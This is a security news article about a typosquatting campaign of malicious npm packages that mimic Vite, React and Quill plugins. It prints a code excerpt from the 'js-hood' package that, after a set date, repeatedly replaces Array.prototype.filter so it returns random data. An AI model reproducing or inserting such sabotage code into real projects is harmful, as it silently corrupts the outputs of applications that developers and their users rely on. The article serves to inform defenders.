In a troubling development for the JavaScript ecosystem, security researchers have discovered a sophisticated campaign targeting popular frameworks through weaponized npm packages.

These malicious packages, which have accumulated over 6,200 downloads, masquerade as legitimate plugins and utilities while secretly containing destructive payloads designed to corrupt data, delete critical files, and crash systems.

The threat actor behind this campaign, using the npm alias “xuxingfeng” with a registration email 1634389031@qq[.]com, has employed a clever dual strategy of publishing both harmful and helpful packages.

By releasing legitimate, properly functioning packages alongside malicious ones, the attacker creates a facade of trustworthiness that makes their harmful code more likely to be installed and incorporated into projects.

Socket.dev researchers identified eight malicious packages that remain active on the npm registry as of May 22, 2025.

These packages rely on typosquatting and name mimicry techniques to gain installation, with names like “vite-plugin-react-extend” (typosquatting the legitimate @vitejs/plugin-react) and “quill-image-downloader” (mimicking the naming pattern of legitimate Quill editor plugins).

The packages strategically target some of the most popular tools in modern JavaScript development, including Vite (with 28M+ weekly downloads) and widely-used plugins for frameworks like React and Vue.js.

By mimicking common plugin names, attackers exploit developers’ reliance on third-party extensions and their trust in the npm ecosystem.

What makes this campaign particularly concerning is the diversity of attack vectors deployed, ranging from subtle data corruption to aggressive system shutdowns and file deletion.

The packages were designed to target different parts of the JavaScript ecosystem with varied tactics, creating a multi-faceted threat landscape.

The Silent Corruptions: Breaking Core JavaScript Functionality

Among the most sophisticated components of this attack is the “js-hood” package, which directly targets JavaScript’s fundamental methods.

Unlike packages that cause immediate, obvious damage through file deletion or system shutdowns, js-hood introduces subtle but devastating corruption of core JavaScript functionality.

The package specifically corrupts numerous fundamental JavaScript methods, including essential Array methods like filter, push, pop, map, and slice, as well as critical String methods such as split, replaceAll, and trim.

Each corrupted method maintains its expected syntax and signature but returns completely random and unpredictable values:-

// After August 1, 2023, start corrupting JavaScript
if(new Date().getTime() > new Date("2023/08/01 08:00:01").getTime()) {
    setInterval(() => {
        // Replace Array.prototype.filter with nonsense function
        Array.prototype.filter = function(fn) {
            var arr = this, len = arr.length, arg = arguments[1] || window,
                newArr = [], item;
            for(var i = 0; i < len; i++) {
                item = JSON.parse(JSON.stringify(arr[i]));
                fn.apply(arg, [item, i, arr]) ? newArr.push(item) : "";
            }
            // Instead of returning filtered data, return array of random characters
            return Array(len).fill(randomVal(characterArr));
        };
    }, randomVal(items) * 60 * 1000); // Random interval between 5-10 minutes
}

This approach is particularly dangerous because applications continue to run without obvious errors, but produce corrupted, unpredictable outputs.

By introducing non-deterministic failures that return random data at randomized intervals of 5-10 minutes, the malware creates hard-to-diagnose intermittent problems that persist through debugging efforts.

For developers who suspect exposure, security experts recommend immediately auditing installed dependencies, restoring affected environments from verified sources, and rotating all potentially compromised credentials.

Organizations should also implement package security scanning tools that can detect these types of supply chain attacks before they enter the codebase.

Equip your SOC team with deep threat analysis for faster response -> Get Extra 𝗦𝗮𝗻𝗱𝗯𝗼𝘅 𝗹𝗶𝗰𝗲𝗻𝘀𝗲𝘀 for Free